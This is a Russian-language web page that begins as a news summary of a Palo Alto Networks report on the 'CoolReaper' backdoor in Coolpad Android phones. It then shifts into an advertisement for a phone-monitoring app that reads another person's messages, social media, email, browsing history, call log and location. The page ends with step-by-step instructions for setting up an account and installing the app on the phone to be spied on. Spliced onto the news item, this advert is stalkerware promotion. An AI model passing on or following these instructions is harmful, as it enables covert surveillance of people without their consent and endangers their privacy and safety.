В Android устройствах от Coolpad обнаружен бэкдор

012Сотрудники компании Palo Alto Networks опубликовали официальный отчёт, в котором подробно изложили возможности использования бэкдора в устройствах под управлением Android, произведённых Coolpad. Сам термин «бэкдор» (от англ. back door – «чёрный вход») обозначает неисправность, которая позволяет хакерам проникать в программную оболочку удалённо, запускать туда вирусы и трояны, просматривать конфиденциальную информацию пользователя.

Например, использование бэкдора позволяло злоумышленникам выдавать уведомления об OTA (over-the-air) обновлениях, посредством которых в телефон жертвы можно было устанавливать любые сторонние приложения. Для активации нужного злоумышленникам софта согласия пользователя смартфона не требовалось. Более того, владелец аппарата мог и вовсе ничего не узнать.

Появлялась и статистика используемых приложений, список звонков, текущее месторасположение устройства. Эта информация могла бы использоваться хакерами для различных противоправных целей. Приложение бэкдор носит название «CoolReaper». Что самое удивительное, эксперты полагают, что сама Coolpad могла создать данную программу, поскольку цифровая подпись компании присутствует во всех заражённых APK файлах!

Специалисты изучили более 40 ПЗУ, в которых обнаруживались следы «CoolReaper». В некоторых моделях присутствовала защита от обнаружения, поэтому даже антивирусное ПО не смогло бы выявить наличие бэкдора. Также в Интернете найдены домены coolyun.com и 51Coolpad.com, зарегистрированные Coolpad и используемые в качестве C&C серверов, для пересылки собранных данных. Получено подтверждение того, что как минимум в 25 моделях от этой компании подобная уязвимость имеет место быть. Китайский производитель пока никак не комментирует результаты исследования.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.